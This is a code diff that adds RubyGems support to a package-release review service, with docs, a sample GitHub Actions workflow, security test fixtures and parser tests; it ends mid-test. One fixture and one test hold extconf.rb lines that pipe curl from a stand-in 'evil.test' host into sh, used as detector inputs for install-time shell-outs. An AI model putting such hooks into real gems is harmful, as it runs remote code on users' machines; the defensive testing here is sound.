+  gemMetadata?: string | null;
   suspiciousEntries?: TarSuspiciousEntry[];
 }
 

--- a/src/models/github-app.ts
+++ b/src/models/github-app.ts
@@ -16,7 +16,7 @@ export interface PublicGithubAppInstallation {
   updatedAt: string;
 }
 
-export type SupportedEcosystem = "pypi" | "npm";
+export type SupportedEcosystem = "pypi" | "npm" | "rubygems";
 
 export interface PublicReleaseTarget {
   id: string;

--- a/src/pages/Docs/index.tsx
+++ b/src/pages/Docs/index.tsx
@@ -41,7 +41,11 @@ export default function DocsPage() {
             Run <Code>npm publish --stage</Code>. npm holds a private candidate, Drydock reviews it,
             and you complete the publish in npm with your own 2FA.
           </ModeCard>
-          <ModeCard href="#workflow-gating" title="Workflow gating: PyPI & npm" badge="Preview">
+          <ModeCard
+            href="#workflow-gating"
+            title="Workflow gating: PyPI, npm & RubyGems"
+            badge="Preview"
+          >
             GitHub Actions builds and uploads the release artifact. A GitHub Environment pauses
             publishing until a maintainer approves or rejects the Drydock review.
           </ModeCard>
@@ -122,43 +126,48 @@ export default function DocsPage() {
         <section id="workflow-gating" class="flex flex-col gap-8 scroll-mt-6">
           <div class="flex flex-col gap-3">
             <SectionLabel>
-              Workflow gating: PyPI &amp; npm on GitHub Actions <Badge tone="info">Preview</Badge>
+              Workflow gating: PyPI, npm &amp; RubyGems on GitHub Actions{" "}
+              <Badge tone="info">Preview</Badge>
             </SectionLabel>
             <h2 class="text-2xl font-semibold tracking-[-0.015em] m-0 max-w-[680px]">
               When the registry can't pause, the workflow can.
             </h2>
             <Prose>
-              PyPI has no staging step, and some npm workflows publish directly from CI. For those
-              releases, the publish job becomes the checkpoint: CI builds wheels, sdists, or
-              tarballs, uploads them as a workflow artifact, and enters a GitHub Environment
-              protected by Drydock. Drydock reviews the upload and records a recommendation; a
-              maintainer approves or rejects in the workbench; if approved, the job continues using
-              its own credential.
+              PyPI and RubyGems have no staging step, and some npm workflows publish directly from
+              CI. For those releases, the publish job becomes the checkpoint: CI builds wheels,
+              sdists, tarballs, or gems, uploads them as a workflow artifact, and enters a GitHub
+              Environment protected by Drydock. Drydock reviews the upload and records a
+              recommendation; a maintainer approves or rejects in the workbench; if approved, the
+              job continues using its own credential.
             </Prose>
             <Prose>
-              PyPI and npm use the same gate. Drydock detects each package's ecosystem from the
-              uploaded files, so this walkthrough uses PyPI as the example. For npm, a workflow gate
-              is the alternative to{" "}
+              PyPI, npm, and RubyGems use the same gate. Drydock detects each package's ecosystem
+              from the uploaded files, so this walkthrough starts with PyPI as the example. For npm,
+              a workflow gate is the alternative to{" "}
               <a class="underline" href="#staged-publishing">
                 staged-publish review
               </a>{" "}
-              when a repository publishes without staging.
+              when a repository publishes without staging; for RubyGems, the gate reviews the exact{" "}
+              <Code>.gem</Code> files that GitHub Actions later pushes.
             </Prose>
           </div>
 
           <Subsection title="Set it up">
             <Steps
               items={[
-                <>Sign in and choose the organization that owns the PyPI project.</>,
+                <>
+                  Sign in and choose the organization that owns the package project or repository.
+                </>,
                 <>
                   Open <Code>Organization settings → GitHub App</Code> and install the Drydock
                   GitHub App on the GitHub account that hosts your repository. You'll be redirected
                   to GitHub to pick the account and grant access to the repo, then back to Drydock.
                 </>,
                 <>
-                  In the repository, create a GitHub Environment (for example <Code>pypi</Code>),
-                  configure it as a PyPI Trusted Publisher, and enable Drydock as a custom
-                  deployment protection rule on that same environment.
+                  In the repository, create a GitHub Environment (for example <Code>pypi</Code> or{" "}
+                  <Code>rubygems</Code>), configure the registry's trusted publishing integration
+                  against that environment when the registry supports it, and enable Drydock as a
+                  custom deployment protection rule on the same environment.
                 </>,
                 <>
                   On the same settings page, map the repository and environment so Drydock knows
@@ -182,11 +191,11 @@ export default function DocsPage() {
 
           <Subsection title="Release-candidate bundle">
             <Prose>
-              You do not write a manifest. CI builds and uploads <Code>dist/*</Code>, and Drydock
-              treats every <Code>.whl</Code>, <Code>.tar.gz</Code>, and <Code>.tgz</Code> it finds
-              in the upload as part of the release. The settings form can narrow this down to one
-              artifact name; when left blank, Drydock inspects every non-expired artifact from the
-              held run and fails closed if an archive is ambiguous.
+              You do not write a manifest. CI builds and uploads the release files, and Drydock
+              treats every <Code>.whl</Code>, <Code>.tar.gz</Code>, <Code>.tgz</Code>, and{" "}
+              <Code>.gem</Code> it finds in the upload as part of the release. The settings form can
+              narrow this down to one artifact name; when left blank, Drydock inspects every
+              non-expired artifact from the held run and fails closed if an archive is ambiguous.
             </Prose>
             <Prose>
               Drydock reads each package's name and version out of the files themselves and
@@ -197,17 +206,18 @@ export default function DocsPage() {
             </Prose>
             <Prose>
               You usually do not declare which ecosystem you're publishing. Drydock tells an npm
-              tarball from a PyPI sdist by looking inside it, so the same gate can review either one
-              or both at once in a mixed monorepo.
+              tarball from a PyPI sdist by looking inside it, and routes RubyGems by the unique{" "}
+              <Code>.gem</Code> extension, so the same gate can review several ecosystems at once in
+              a mixed monorepo.
             </Prose>
           </Subsection>
 
           <Subsection title="Monorepo releases">
             <Prose>
               One workflow run can publish several packages at once, like a monorepo cutting many
-              wheels and sdists in a single release. Drydock groups the uploads by package and opens
-              one review per package, each diffed against its own previously published version. A
-              single gate covers every package the environment publishes.
+              wheels, sdists, tarballs, or gems in a single release. Drydock groups the uploads by
+              package and opens one review per package, each diffed against its own previously
+              published version. A single gate covers every package the environment publishes.
             </Prose>
             <Prose>
               The held publish is released once every package is approved, and rejecting any single
@@ -298,6 +308,47 @@ export default function DocsPage() {
       - run: |
           for tgz in dist/*.tgz; do
             npm publish "$tgz" --access public --provenance
+          done`}
+            </CodeBlock>
+            <Prose>
+              RubyGems uses the same no-rebuild rule. Build <Code>pkg/*.gem</Code>, upload those gem
+              files, and have the gated publish job download and push the reviewed bytes through
+              RubyGems Trusted Publishing.
+            </Prose>
+            <CodeBlock name=".github/workflows/release.yml (RubyGems)">
+              {`jobs:
+  build-release-artifacts:
+    runs-on: ubuntu-latest
+    steps:
+      - uses: actions/checkout@v4
+      - uses: ruby/setup-ruby@v1
+        with:
+          ruby-version: "3.3"
+      - run: gem build *.gemspec --output pkg/example.gem
+      - uses: actions/upload-artifact@v4
+        with:
+          name: rubygems-release-candidate
+          path: pkg/*.gem
+
+  publish:
+    needs: build-release-artifacts
+    runs-on: ubuntu-latest
+    environment: rubygems
+    permissions:
+      id-token: write
+      contents: read
+    steps:
+      - uses: ruby/setup-ruby@v1
+        with:
+          ruby-version: "3.3"
+      - uses: actions/download-artifact@v4
+        with:
+          name: rubygems-release-candidate
+          path: pkg
+      - uses: rubygems/configure-rubygems-credentials@main
+      - run: |
+          for gem in pkg/*.gem; do
+            gem push "$gem"
           done`}
             </CodeBlock>
           </Subsection>

--- a/test/fixtures/security-corpus/cases-rubygems/01-benign-pure-ruby.json
+++ b/test/fixtures/security-corpus/cases-rubygems/01-benign-pure-ruby.json
@@ -1,0 +1,51 @@
+{
+  "id": "rubygems-benign-control",
+  "parityGroup": "benign-version-bump",
+  "title": "clean pure-ruby gem raises nothing",
+  "category": "control",
+  "intent": "a well-formed gem with matching metadata and no native code or capabilities must stay low risk",
+  "manifest": {
+    "schema": "drydock.release-artifacts.v1",
+    "ecosystem": "rubygems",
+    "package": "calc",
+    "version": "1.1.0",
+    "artifacts": [
+      {
+        "path": "calc-1.1.0.gem",
+        "sha256": "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
+      }
+    ]
+  },
+  "artifacts": [
+    {
+      "path": "calc-1.1.0.gem",
+      "gemMetadata": "--- !ruby/object:Gem::Specification\nname: calc\nversion: !ruby/object:Gem::Version\n  version: 1.1.0\nplatform: ruby\nbindir: bin\ndependencies: []\nexecutables: []\nextensions: []\nmetadata: {}\nrequire_paths:\n- lib\n",
+      "files": [
+        {
+          "path": "lib/calc.rb",
+          "size": 45,
+          "sha256": "sha-calc-shared",
+          "flags": [],
+          "textSample": "module Calc\n  def self.add(a, b) = a + b\nend\n"
+        }
+      ]
+    }
+  ],
+  "previousArtifacts": [
+    {
+      "path": "calc-1.0.0.gem",
+      "gemMetadata": "--- !ruby/object:Gem::Specification\nname: calc\nversion: !ruby/object:Gem::Version\n  version: 1.0.0\nplatform: ruby\nbindir: bin\ndependencies: []\nexecutables: []\nextensions: []\nmetadata: {}\nrequire_paths:\n- lib\n",
+      "files": [
+        {
+          "path": "lib/calc.rb",
+          "size": 45,
+          "sha256": "sha-calc-shared",
+          "flags": [],
+          "textSample": "module Calc\n  def self.add(a, b) = a + b\nend\n"
+        }
+      ]
+    }
+  ],
+  "expectedRisk": "low",
+  "expectedFindings": []
+}

--- a/test/fixtures/security-corpus/cases-rubygems/02-native-extension-benign.json
+++ b/test/fixtures/security-corpus/cases-rubygems/02-native-extension-benign.json
@@ -1,0 +1,49 @@
+{
+  "id": "rubygems-native-extension-benign",
+  "parityGroup": "native-extension",
+  "title": "benign native extension flags the install-time build surface",
+  "category": "native",
+  "intent": "declaring native extensions surfaces that gem install compiles code, even when the build script is benign",
+  "manifest": {
+    "schema": "drydock.release-artifacts.v1",
+    "ecosystem": "rubygems",
+    "package": "fastcalc",
+    "version": "1.0.0",
+    "artifacts": [
+      {
+        "path": "fastcalc-1.0.0.gem",
+        "sha256": "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
+      }
+    ]
+  },
+  "artifacts": [
+    {
+      "path": "fastcalc-1.0.0.gem",
+      "gemMetadata": "--- !ruby/object:Gem::Specification\nname: fastcalc\nversion: !ruby/object:Gem::Version\n  version: 1.0.0\nplatform: ruby\nbindir: bin\ndependencies: []\nexecutables: []\nextensions:\n- ext/fastcalc/extconf.rb\nmetadata: {}\nrequire_paths:\n- lib\n",
+      "files": [
+        {
+          "path": "ext/fastcalc/extconf.rb",
+          "size": 75,
+          "sha256": "sha-ext/fastcalc/extconf.rb",
+          "flags": [],
+          "textSample": "require 'mkmf'\nhave_header('stdio.h')\ncreate_makefile('fastcalc/fastcalc')\n"
+        },
+        {
+          "path": "lib/fastcalc.rb",
+          "size": 28,
+          "sha256": "sha-lib/fastcalc.rb",
+          "flags": [],
+          "textSample": "require 'fastcalc/fastcalc'\n"
+        }
+      ]
+    }
+  ],
+  "expectedRisk": "medium",
+  "expectedFindings": [
+    {
+      "ruleId": "rubygems.native-extension",
+      "severity": "medium",
+      "file": "fastcalc-1.0.0.gem/ext/fastcalc/extconf.rb"
+    }
+  ]
+}

--- a/test/fixtures/security-corpus/cases-rubygems/03-extension-install-shellout.json
+++ b/test/fixtures/security-corpus/cases-rubygems/03-extension-install-shellout.json
@@ -1,0 +1,59 @@
+{
+  "id": "rubygems-extension-install-shellout",
+  "parityGroup": "native-extension",
+  "title": "native extension build hook shells out at install time",
+  "category": "native",
+  "intent": "an extconf.rb that shells out runs during gem install, so it must raise both the install-hook and the shared process-execution finding",
+  "manifest": {
+    "schema": "drydock.release-artifacts.v1",
+    "ecosystem": "rubygems",
+    "package": "fastcalc",
+    "version": "2.0.0",
+    "artifacts": [
+      {
+        "path": "fastcalc-2.0.0.gem",
+        "sha256": "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
+      }
+    ]
+  },
+  "artifacts": [
+    {
+      "path": "fastcalc-2.0.0.gem",
+      "gemMetadata": "--- !ruby/object:Gem::Specification\nname: fastcalc\nversion: !ruby/object:Gem::Version\n  version: 2.0.0\nplatform: ruby\nbindir: bin\ndependencies: []\nexecutables: []\nextensions:\n- ext/fastcalc/extconf.rb\nmetadata: {}\nrequire_paths:\n- lib\n",
+      "files": [
+        {
+          "path": "ext/fastcalc/extconf.rb",
+          "size": 100,
+          "sha256": "sha-ext/fastcalc/extconf.rb",
+          "flags": [],
+          "textSample": "require 'mkmf'\nsystem(\"curl http://evil.test/payload.sh | sh\")\ncreate_makefile('fastcalc/fastcalc')\n"
+        },
+        {
+          "path": "lib/fastcalc.rb",
+          "size": 28,
+          "sha256": "sha-lib/fastcalc.rb",
+          "flags": [],
+          "textSample": "require 'fastcalc/fastcalc'\n"
+        }
+      ]
+    }
+  ],
+  "expectedRisk": "high",
+  "expectedFindings": [
+    {
+      "ruleId": "code.process-execution",
+      "severity": "high",
+      "file": "ruby/ext/fastcalc/extconf.rb"
+    },
+    {
+      "ruleId": "rubygems.extension-build-hook",
+      "severity": "high",
+      "file": "fastcalc-2.0.0.gem/ext/fastcalc/extconf.rb"
+    },
+    {
+      "ruleId": "rubygems.native-extension",
+      "severity": "medium",
+      "file": "fastcalc-2.0.0.gem/ext/fastcalc/extconf.rb"
+    }
+  ]
+}

--- a/test/fixtures/security-corpus/cases-rubygems/04-metadata-name-mismatch.json
+++ b/test/fixtures/security-corpus/cases-rubygems/04-metadata-name-mismatch.json
@@ -1,0 +1,42 @@
+{
+  "id": "rubygems-metadata-name-mismatch",
+  "parityGroup": "identity",
+  "title": "gemspec name disagrees with the reviewed manifest",
+  "category": "identity",
+  "intent": "a gem whose metadata.gz name does not match the reviewed manifest is a critical identity failure",
+  "manifest": {
+    "schema": "drydock.release-artifacts.v1",
+    "ecosystem": "rubygems",
+    "package": "trusted-gem",
+    "version": "1.0.0",
+    "artifacts": [
+      {
+        "path": "trusted-gem-1.0.0.gem",
+        "sha256": "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
+      }
+    ]
+  },
+  "artifacts": [
+    {
+      "path": "trusted-gem-1.0.0.gem",
+      "gemMetadata": "--- !ruby/object:Gem::Specification\nname: evil-gem\nversion: !ruby/object:Gem::Version\n  version: 1.0.0\nplatform: ruby\nbindir: bin\ndependencies: []\nexecutables: []\nextensions: []\nmetadata: {}\nrequire_paths:\n- lib\n",
+      "files": [
+        {
+          "path": "lib/trusted.rb",
+          "size": 20,
+          "sha256": "sha-lib/trusted.rb",
+          "flags": [],
+          "textSample": "module Trusted; end\n"
+        }
+      ]
+    }
+  ],
+  "expectedRisk": "critical",
+  "expectedFindings": [
+    {
+      "ruleId": "rubygems.metadata-mismatch",
+      "severity": "critical",
+      "file": "trusted-gem-1.0.0.gem (gemspec)"
+    }
+  ]
+}

--- a/test/fixtures/security-corpus/cases-rubygems/05-missing-gemspec.json
+++ b/test/fixtures/security-corpus/cases-rubygems/05-missing-gemspec.json
@@ -1,0 +1,42 @@
+{
+  "id": "rubygems-metadata-missing",
+  "parityGroup": "identity",
+  "title": "gem ships no parseable Gem::Specification",
+  "category": "identity",
+  "intent": "a gem with no usable metadata cannot be proven to match the manifest and must raise metadata-missing",
+  "manifest": {
+    "schema": "drydock.release-artifacts.v1",
+    "ecosystem": "rubygems",
+    "package": "bare",
+    "version": "1.0.0",
+    "artifacts": [
+      {
+        "path": "bare-1.0.0.gem",
+        "sha256": "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
+      }
+    ]
+  },
+  "artifacts": [
+    {
+      "path": "bare-1.0.0.gem",
+      "gemMetadata": null,
+      "files": [
+        {
+          "path": "lib/bare.rb",
+          "size": 17,
+          "sha256": "sha-lib/bare.rb",
+          "flags": [],
+          "textSample": "module Bare; end\n"
+        }
+      ]
+    }
+  ],
+  "expectedRisk": "medium",
+  "expectedFindings": [
+    {
+      "ruleId": "rubygems.metadata-missing",
+      "severity": "medium",
+      "file": "bare-1.0.0.gem (gemspec)"
+    }
+  ]
+}

--- a/test/fixtures/security-corpus/cases-rubygems/06-unexpected-push-host.json
+++ b/test/fixtures/security-corpus/cases-rubygems/06-unexpected-push-host.json
@@ -1,0 +1,42 @@
+{
+  "id": "rubygems-unexpected-push-host",
+  "parityGroup": "provenance",
+  "title": "gemspec restricts pushes to a non-rubygems host",
+  "category": "provenance",
+  "intent": "an allowed_push_host other than rubygems.org is a provenance signal worth surfacing at low severity",
+  "manifest": {
+    "schema": "drydock.release-artifacts.v1",
+    "ecosystem": "rubygems",
+    "package": "internal-tool",
+    "version": "3.2.0",
+    "artifacts": [
+      {
+        "path": "internal-tool-3.2.0.gem",
+        "sha256": "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
+      }
+    ]
+  },
+  "artifacts": [
+    {
+      "path": "internal-tool-3.2.0.gem",
+      "gemMetadata": "--- !ruby/object:Gem::Specification\nname: internal-tool\nversion: !ruby/object:Gem::Version\n  version: 3.2.0\nplatform: ruby\nbindir: bin\ndependencies: []\nexecutables: []\nextensions: []\nmetadata:\n  allowed_push_host: https://gems.internal.test\nrequire_paths:\n- lib\n",
+      "files": [
+        {
+          "path": "lib/internal_tool.rb",
+          "size": 25,
+          "sha256": "sha-lib/internal_tool.rb",
+          "flags": [],
+          "textSample": "module InternalTool; end\n"
+        }
+      ]
+    }
+  ],
+  "expectedRisk": "low",
+  "expectedFindings": [
+    {
+      "ruleId": "rubygems.unexpected-push-host",
+      "severity": "low",
+      "file": "internal-tool-3.2.0.gem (gemspec)"
+    }
+  ]
+}

--- a/test/github-app.test.mjs
+++ b/test/github-app.test.mjs
@@ -204,12 +204,18 @@ describe("release target validation", () => {
 
   test("rejects unsupported ecosystems", () => {
     try {
-      validateReleaseTargetShape({ ...VALID_RELEASE_TARGET, ecosystem: "rubygems" });
+      validateReleaseTargetShape({ ...VALID_RELEASE_TARGET, ecosystem: "cargo" });
       throw new Error("expected validation to throw");
     } catch (err) {
       expect(err).toBeInstanceOf(GithubAppValidationError);
       expect(err.code).toBe("unsupported_ecosystem");
     }
+  });
+
+  test("accepts the rubygems ecosystem", () => {
+    expect(() =>
+      validateReleaseTargetShape({ ...VALID_RELEASE_TARGET, ecosystem: "rubygems" }),
+    ).not.toThrow();
   });
 
   test("rejects malformed repository identifiers", () => {

--- a/test/review.test.mjs
+++ b/test/review.test.mjs
@@ -587,6 +587,50 @@ describe("review", () => {
     });
   });
 
+  test("keeps RubyGems release findings release scoped even without a diff path match", () => {
+    const annotated = annotateFindingsWithDiffStatus(
+      [
+        {
+          id: "rubygems-identity",
+          ruleId: "rubygems.metadata-mismatch",
+          severity: "critical",
+          file: "demo-1.0.0.gem (gemspec)",
+          evidence: "gemspec name disagrees with manifest",
+          reason: "the release artifact gem name does not match the reviewed manifest",
+        },
+      ],
+      [{ path: "ruby/lib/demo.rb", status: "added" }],
+    );
+
+    expect(annotated[0]).toMatchObject({
+      diffStatus: "unknown",
+      releaseDelta: true,
+    });
+    expect(computeRisk(annotated.filter((finding) => finding.releaseDelta))).toBe("critical");
+  });
+
+  test("detects Ruby shellouts without parentheses", () => {
+    const staged = [
+      {
+        path: "ext/demo/extconf.rb",
+        size: 100,
+        sha256: "ruby-shellout",
+        flags: [],
+        textSample: 'system "curl https://evil.test/install | sh"\n`whoami`\n',
+      },
+    ];
+    const diff = createPackageDiff([], staged);
+    const findings = deterministicFindings(staged, diff, null, { codePatternSet: "ruby" });
+
+    expect(findings).toContainEqual(
+      expect.objectContaining({
+        file: "ext/demo/extconf.rb",
+        ruleId: "code.process-execution",
+        line: 1,
+      }),
+    );
+  });
+
   test("keeps modified-file findings release scoped when a later matching line changed", () => {
     const previous = [
       {

--- a/test/rubygems-gem-parse.test.mjs
+++ b/test/rubygems-gem-parse.test.mjs
@@ -146,6 +146,17 @@ describe("readGem", () => {
     await expect(readGem(gem, ...LIMITS)).rejects.toThrow(/metadata too large/);
   });
 
+  test("throws on duplicate control members instead of picking one", async () => {
+    const benignGz = gzipSync(Buffer.from(buildTar([{ name: "lib/x.rb", body: "x = 1\n" }])));
+    const evilGz = gzipSync(Buffer.from(buildTar([{ name: "lib/x.rb", body: "system 'sh'\n" }])));
+    const gem = buildTar([
+      { name: "metadata.gz", body: new Uint8Array(gzipSync(Buffer.from(METADATA))) },
+      { name: "data.tar.gz", body: new Uint8Array(benignGz) },
+      { name: "data.tar.gz", body: new Uint8Array(evilGz) },
+    ]);
+    await expect(readGem(gem, ...LIMITS)).rejects.toThrow(/duplicate members/);
+  });
+
   test("readTarRawEntries returns only the requested members verbatim", async () => {
     const gem = buildGem({ files: [{ name: "lib/x.rb", body: "x\n" }], metadata: METADATA });
     const members = await readTarRawEntries(gem, ["metadata.gz", "data.tar.gz"], LIMITS[1]);

--- a/test/rubygems-gem-parse.test.mjs
+++ b/test/rubygems-gem-parse.test.mjs
@@ -1,0 +1,155 @@
+// @ts-nocheck
+import { gzipSync } from "node:zlib";
+import { describe, expect, test } from "vitest";
+import { readGem, readTarRawEntries } from "../server/lib/tar-parser.js";
+
+// Minimal ustar tar writer (mirrors test/tar-parser.test.mjs) used to assemble
+// both the inner `data.tar` and the outer `.gem` container in-memory.
+const BLOCK = 512;
+const encoder = new TextEncoder();
+
+function pad(bytes, length) {
+  const out = new Uint8Array(length);
+  out.set(bytes.subarray(0, length), 0);
+  return out;
+}
+
+function octal(value, length) {
+  return pad(encoder.encode(value.toString(8).padStart(length - 1, "0") + "\0"), length);
+}
+
+function header({ name = "", size = 0, type = "0", prefix = "" }) {
+  const buf = new Uint8Array(BLOCK);
+  buf.set(pad(encoder.encode(name), 100), 0);
+  buf.set(pad(encoder.encode("0000644"), 8), 100);
+  buf.set(octal(size, 12), 124);
+  buf.set(pad(encoder.encode("        "), 8), 148);
+  buf[156] = type.charCodeAt(0);
+  buf.set(pad(encoder.encode("ustar"), 6), 257);
+  buf.set(pad(encoder.encode("00"), 2), 263);
+  buf.set(pad(encoder.encode(prefix), 155), 345);
+  return buf;
+}
+
+function buildTar(entries) {
+  const parts = [];
+  for (const entry of entries) {
+    const bytes = entry.body instanceof Uint8Array ? entry.body : encoder.encode(entry.body ?? "");
+    parts.push(header({ ...entry, size: bytes.length }));
+    const padded = Math.ceil(bytes.length / BLOCK) * BLOCK;
+    const body = new Uint8Array(padded);
+    body.set(bytes, 0);
+    parts.push(body);
+  }
+  parts.push(new Uint8Array(BLOCK * 2));
+  const total = parts.reduce((sum, part) => sum + part.length, 0);
+  const out = new Uint8Array(total);
+  let offset = 0;
+  for (const part of parts) {
+    out.set(part, offset);
+    offset += part.length;
+  }
+  return out;
+}
+
+function buildGem({ files, metadata, extraMembers = [] } = {}) {
+  const dataTar = buildTar(files);
+  const dataGz = gzipSync(Buffer.from(dataTar));
+  const metaGz = gzipSync(Buffer.from(metadata ?? ""));
+  return buildTar([
+    { name: "metadata.gz", body: new Uint8Array(metaGz) },
+    { name: "data.tar.gz", body: new Uint8Array(dataGz) },
+    { name: "checksums.yaml.gz", body: new Uint8Array(gzipSync(Buffer.from("---\n"))) },
+    ...extraMembers,
+  ]);
+}
+
+const LIMITS = [2_500, 25 * 1024 * 1024];
+
+const METADATA = `--- !ruby/object:Gem::Specification
+name: example
+version: !ruby/object:Gem::Version
+  version: 1.2.3
+`;
+
+describe("readGem", () => {
+  test("extracts inner data files and the raw gemspec metadata", async () => {
+    const gem = buildGem({
+      files: [
+        { name: "lib/example.rb", body: "puts 'hi'\n" },
+        { name: "bin/example", body: "#!/usr/bin/env ruby\n" },
+      ],
+      metadata: METADATA,
+    });
+
+    const result = await readGem(gem, ...LIMITS);
+
+    expect(result.files.map((f) => f.path).sort()).toEqual(["bin/example", "lib/example.rb"]);
+    expect(result.files.find((f) => f.path === "lib/example.rb").textSample).toContain("puts");
+    expect(result.gemMetadata).toContain("name: example");
+    expect(result.gemMetadata).toContain("version: 1.2.3");
+  });
+
+  test("surfaces suspicious entries from the inner data tar", async () => {
+    const gem = buildGem({
+      files: [
+        { name: "lib/example.rb", body: "x = 1\n" },
+        { name: "ext/evil/link", type: "2", body: "" }, // symlink
+      ],
+      metadata: METADATA,
+    });
+
+    const result = await readGem(gem, ...LIMITS);
+    expect(result.suspicious.some((s) => s.kind === "non-regular")).toBe(true);
+  });
+
+  test("preserves package-prefixed paths inside gem data archives", async () => {
+    const gem = buildGem({
+      files: [
+        { name: "lib/example.rb", body: "root = true\n" },
+        { name: "package/lib/example.rb", body: "nested = true\n" },
+      ],
+      metadata: METADATA,
+    });
+
+    const result = await readGem(gem, ...LIMITS);
+
+    expect(result.files.map((f) => f.path).sort()).toEqual([
+      "lib/example.rb",
+      "package/lib/example.rb",
+    ]);
+  });
+
+  test("returns null metadata when metadata.gz is absent but still parses files", async () => {
+    // Hand-built gem with only a data member (no metadata.gz).
+    const dataGz = gzipSync(Buffer.from(buildTar([{ name: "lib/x.rb", body: "x\n" }])));
+    const gem = buildTar([{ name: "data.tar.gz", body: new Uint8Array(dataGz) }]);
+    const result = await readGem(gem, ...LIMITS);
+    expect(result.gemMetadata).toBeNull();
+    expect(result.files.map((f) => f.path)).toEqual(["lib/x.rb"]);
+  });
+
+  test("throws when the data archive member is missing", async () => {
+    const gem = buildTar([
+      { name: "metadata.gz", body: new Uint8Array(gzipSync(Buffer.from(METADATA))) },
+    ]);
+    await expect(readGem(gem, ...LIMITS)).rejects.toThrow(/missing data archive/);
+  });
+
+  test("throws instead of parsing truncated gemspec metadata", async () => {
+    const oversizedMetadata = METADATA + "\n".repeat(262145);
+    const gem = buildGem({
+      files: [{ name: "lib/example.rb", body: "x\n" }],
+      metadata: oversizedMetadata,
+    });
+
+    await expect(readGem(gem, ...LIMITS)).rejects.toThrow(/metadata too large/);
+  });
+
+  test("readTarRawEntries returns only the requested members verbatim", async () => {
+    const gem = buildGem({ files: [{ name: "lib/x.rb", body: "x\n" }], metadata: METADATA });
+    const members = await readTarRawEntries(gem, ["metadata.gz", "data.tar.gz"], LIMITS[1]);
+    expect([...members.keys()].sort()).toEqual(["data.tar.gz", "metadata.gz"]);
+    expect(members.get("metadata.gz")).toBeInstanceOf(Uint8Array);
+  });
+});

--- a/test/rubygems-gem-parse.test.mjs
+++ b/test/rubygems-gem-parse.test.mjs
@@ -157,6 +157,15 @@ describe("readGem", () => {
     await expect(readGem(gem, ...LIMITS)).rejects.toThrow(/duplicate members/);
   });
 
+  test("throws on legacy uncompressed control members RubyGems would honour", async () => {
+    const gem = buildGem({
+      files: [{ name: "lib/x.rb", body: "x = 1\n" }],
+      metadata: METADATA,
+      extraMembers: [{ name: "metadata", body: METADATA.replace("example", "evil") }],
+    });
+    await expect(readGem(gem, ...LIMITS)).rejects.toThrow(/unexpected control members/);
+  });
+
   test("readTarRawEntries returns only the requested members verbatim", async () => {
     const gem = buildGem({ files: [{ name: "lib/x.rb", body: "x\n" }], metadata: METADATA });
     const members = await readTarRawEntries(gem, ["metadata.gz", "data.tar.gz"], LIMITS[1]);

--- a/test/rubygems-gemspec.test.mjs
+++ b/test/rubygems-gemspec.test.mjs
@@ -1,0 +1,165 @@
+// @ts-nocheck
+import { describe, expect, test } from "vitest";
+import { parseGemspecMetadata } from "../server/lib/adapters/rubygems/gemspec.ts";
+
+// A realistic Gem::Specification#to_yaml emission: native extension, executables,
+// runtime + development dependencies, a metadata hash, and a Ruby version bound.
+const FULL = `--- !ruby/object:Gem::Specification
+name: example-gem
+version: !ruby/object:Gem::Version
+  version: 2.4.1
+platform: ruby
+authors:
+- Jane Doe
+autorequire:
+bindir: exe
+cert_chain: []
+date: 2026-01-02 00:00:00.000000000 Z
+dependencies:
+- !ruby/object:Gem::Dependency
+  name: nokogiri
+  requirement: !ruby/object:Gem::Requirement
+    requirements:
+    - - ">="
+      - !ruby/object:Gem::Version
+        version: '1.10'
+  type: :runtime
+  prerelease: false
+  version_requirements: !ruby/object:Gem::Requirement
+    requirements:
+    - - ">="
+      - !ruby/object:Gem::Version
+        version: '1.10'
+- !ruby/object:Gem::Dependency
+  name: rspec
+  requirement: !ruby/object:Gem::Requirement
+    requirements:
+    - - "~>"
+      - !ruby/object:Gem::Version
+        version: '3.0'
+  type: :development
+  prerelease: false
+  version_requirements: !ruby/object:Gem::Requirement
+    requirements:
+    - - "~>"
+      - !ruby/object:Gem::Version
+        version: '3.0'
+description: An example gem.
+email:
+- jane@example.com
+executables:
+- example
+extensions:
+- ext/example/extconf.rb
+extra_rdoc_files: []
+files:
+- exe/example
+- ext/example/extconf.rb
+- lib/example.rb
+homepage: https://example.com/gem
+licenses:
+- MIT
+metadata:
+  allowed_push_host: https://rubygems.org
+  source_code_uri: https://github.com/example/gem
+post_install_message:
+rdoc_options: []
+require_paths:
+- lib
+required_ruby_version: !ruby/object:Gem::Requirement
+  requirements:
+  - - ">="
+    - !ruby/object:Gem::Version
+      version: 2.7.0
+required_rubygems_version: !ruby/object:Gem::Requirement
+  requirements:
+  - - ">="
+    - !ruby/object:Gem::Version
+      version: '0'
+requirements: []
+rubygems_version: 3.5.3
+signing_key:
+specification_version: 4
+summary: An example gem
+test_files: []
+`;
+
+describe("parseGemspecMetadata", () => {
+  test("extracts identity, capabilities, deps, and metadata", () => {
+    const spec = parseGemspecMetadata(FULL);
+    expect(spec.name).toBe("example-gem");
+    expect(spec.version).toBe("2.4.1");
+    expect(spec.platform).toBe("ruby");
+    expect(spec.bindir).toBe("exe");
+    expect(spec.homepage).toBe("https://example.com/gem");
+    expect(spec.executables).toEqual(["example"]);
+    expect(spec.extensions).toEqual(["ext/example/extconf.rb"]);
+    expect(spec.requirePaths).toEqual(["lib"]);
+    expect(spec.licenses).toEqual(["MIT"]);
+    expect(spec.requiredRubyVersion).toBe(">= 2.7.0");
+    expect(spec.dependencies).toEqual([
+      { name: "nokogiri", type: "runtime" },
+      { name: "rspec", type: "development" },
+    ]);
+    expect(spec.metadata.allowed_push_host).toBe("https://rubygems.org");
+    expect(spec.metadata.source_code_uri).toBe("https://github.com/example/gem");
+  });
+
+  test("handles empty lists and a pure-ruby gem with no extensions", () => {
+    const spec = parseGemspecMetadata(`--- !ruby/object:Gem::Specification
+name: tiny
+version: !ruby/object:Gem::Version
+  version: 0.1.0
